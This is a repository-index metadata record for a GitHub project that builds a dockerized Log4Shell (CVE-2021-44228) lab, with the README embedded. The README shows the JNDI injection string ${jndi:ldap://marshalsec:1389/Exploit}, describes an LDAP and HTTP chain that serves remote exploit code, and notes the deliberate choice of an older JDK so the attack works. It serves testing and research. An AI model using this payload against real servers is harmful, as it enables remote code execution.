{"id":26411381,"url":"https://github.com/alex-ilgayev/log4shell-dockerized","last_synced_at":"2025-03-17T20:33:31.182Z","repository":{"id":281343739,"uuid":"438336656","full_name":"alex-ilgayev/log4shell-dockerized","owner":"alex-ilgayev","description":"Log4Shell dockerized full chain","archived":false,"fork":false,"pushed_at":"2021-12-14T17:46:43.000Z","size":10,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-08T13:18:35.645Z","etag":null,"topics":["log4j2","log4shell"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/alex-ilgayev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-12-14T17:10:36.000Z","updated_at":"2023-03-05T07:34:56.000Z","dependencies_parsed_at":"2025-03-08T13:28:41.286Z","dependency_job_id":null,"html_url":"https://github.com/alex-ilgayev/log4shell-dockerized","commit_stats":null,"previous_names":["alex-ilgayev/log4shell-dockerized"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/alex-ilgayev%2Flog4shell-dockerized/manifests","owner_url":"https:
//repos.ecosyste.ms/api/v1/hosts/GitHub/owners/alex-ilgayev","download_url":"https://codeload.github.com/alex-ilgayev/log4shell-dockerized/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244105837,"owners_count":20398927,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["log4j2","log4shell"],"created_at":"2025-03-17T20:32:29.880Z","updated_at":"2025-03-17T20:33:31.166Z","avatar_url":"https://github.com/alex-ilgayev.png","language":"Java","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Full-chain dockerized Log4Shell (CVE-2021-44228)\n\nLog4Shell (CVE-2021-44228) is a critical vulnerability in the popular log4j2 logging package.\nThis vulnerability is extremely easy to exploit, and was fixed in log4j2 version 2.15.\nThis repository's goal is to automate building the whole environment in a single step by using `docker-compose` and containers.\nThis could be useful for:\n\n- Easily testing different Java versions.\n- Testing different payloads without constructing heavy setups.\n- Easily capturing the traffic for security protection measures.\n- More.\n\nThe setup contains:\n\n- `vuln` - Vulnerable code using log4j2\n- `marshalsec` - An LDAP server serving the exploit in response to the log4j JNDI request\n- `http-server` - A simple Python server serving the compiled exploit Java class file\n\nFurther explanation can be found here:\nhttps://research.checkpoint.com/2021/the-laconic-log4shell-faq/\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Usage\n\nBuild and run all the 
containers\n\n```bash\nsudo docker-compose up --build\n```\n\nOnce everything is up and running, you should see the following messages, indicating that the exploit was successful:\n\n```\nmarshalsec_1   | Send LDAP reference result for Exploit redirecting to http://http-server:8888/Exploit.class\nvuln_1         | Hello from exploit!\nvuln_1         | 17:26:26.531 [main] ERROR log4j - ${jndi:ldap://marshalsec:1389/Exploit}\n```\n\nBehind the scenes, the vulnerable code requests the `Exploit` class from the LDAP server and executes it.\nYou can freely modify the [Exploit](exploit/Exploit.java) file to make custom exploits, or the [log4j](vuln/src/main/java/log4j.java) file to change the malicious log.\n\n## Notes\n\nIn recent JDK versions, the property `com.sun.jndi.ldap.object.trustURLCodebase` is set to `false` by default, which effectively stops the attack. That's why I set the Java version to one older than that.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Falex-ilgayev%2Flog4shell-dockerized/lists"}